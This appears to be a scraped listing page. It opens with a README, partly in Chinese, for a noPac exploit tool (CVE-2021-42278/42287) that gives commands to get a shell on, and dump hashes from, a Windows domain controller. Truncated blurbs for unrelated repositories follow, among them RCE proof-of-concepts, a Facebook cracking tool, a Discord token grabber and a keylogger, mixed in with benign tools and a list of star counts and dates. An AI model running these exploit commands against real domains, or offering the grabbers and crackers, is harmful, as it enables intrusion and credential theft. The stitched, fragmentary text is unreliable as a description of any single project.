Exploiting CVE-2021-42278 and CVE-2021-42287
原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。
pip3 install -r requirements.txt
# GetShell
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -shell
# DumpHash
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -dump
https://github.com/cube0x0/noPac
https://github.com/WazeHell/sam-the-admin
This project was developed using python 3 and Flask, it is an MVC system where the AES 128 CBC and Trivium algorithms can be tested through a communication between the computer and a device such as a
Django Protected Media Django Protected Media is a Django app that manages media that are considered sensitive in a protected fashion. Not only does t
CVE-2021-45897 PoC for CVE-2021-45897 aka SCRMBT-#180 - RCE via Email-Templates (Authenticated only) in SuiteCRM = 8.0.1 This vulnerability was repor
Spring Cloud Gateway 3.0.7 & 3.1.1 Code Injection (RCE) CVE: CVE-2022-22947 CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947)
宝塔面板Windows提权方法 本项目整理一些宝塔特性,可以在无漏洞的情况下利用这些特性来增加提权的机会。
py_annotation_switch A hack for writing switch statements in type annotations for Python. Why should I use this? You most definitely should not use th
Xteam All in one Instagram,Android,phishing osint and wifi hacking tool available
What is a keylogger? A keylogger is a software application or piece of hardware that monitors and records keystrokes made on a computer keyboard. The
MotionEye/MotionEyeOS Authenticated RCE A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. You need administrator crede
CVE-2021-44077 Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus 11306 Based on: https://xz.aliyun.com/t/106
ProxyLogon Pre-Auth SSRF To Arbitrary File Write For Education and Research Usage: C:\python proxylogon.py mail.evil.corp
Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service. This tool can help a digital forensic investigator to know the conte
A tool for removing malicious content from input data before saving data into database. It takes input containing HTML with XSS scripts and returns va
aioloop-proxy A proxy for asyncio.AbstractEventLoop for testing purposes. When tests writing for asyncio based code, there are controversial requireme
Suricata Language Server is an implementation of the Language Server Protocol for Suricata signatures. It adds syntax check, hints and auto-completion to your preferred editor once it is configured.
About Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Changed from sam-the-admin. Usage SAM THE ADMIN CVE-202
Hardware Hacking Resources This repo holds some of the examples used in Colin's Hardware Hacking talk at Remoticon 2021. You can see the very sketchy
NoSecerets NoSecerets is a python script that is designed to crack hashes extremely fast. Faster even than Hashcat How does it work? Instead of taking
Pro_Crack Facebook Fast Cracking Tool This is a multi-password cracking tool that can help you hack facebook accounts very quickly Installation On Te
𝐇𝐔𝐒𝐊𝐄𝐄 Caracteristicas: Discord Token Grabber Wifi Passwords Grabber Googl
1 Dec 26, 2021
46 Nov 12, 2022
17 Nov 09, 2022
35 Dec 28, 2022
298 Dec 14, 2022
6 Oct 17, 2021
283 Dec 29, 2022
7 Sep 19, 2022
1 Apr 18, 2022
25 Nov 09, 2022
96 Dec 20, 2022
2 Jul 05, 2022
12 Dec 12, 2022
39 Nov 28, 2022
500 Jan 06, 2023
19 Sep 12, 2022
9 Jul 04, 2022
1 Jan 16, 2022
4 Aug 17, 2022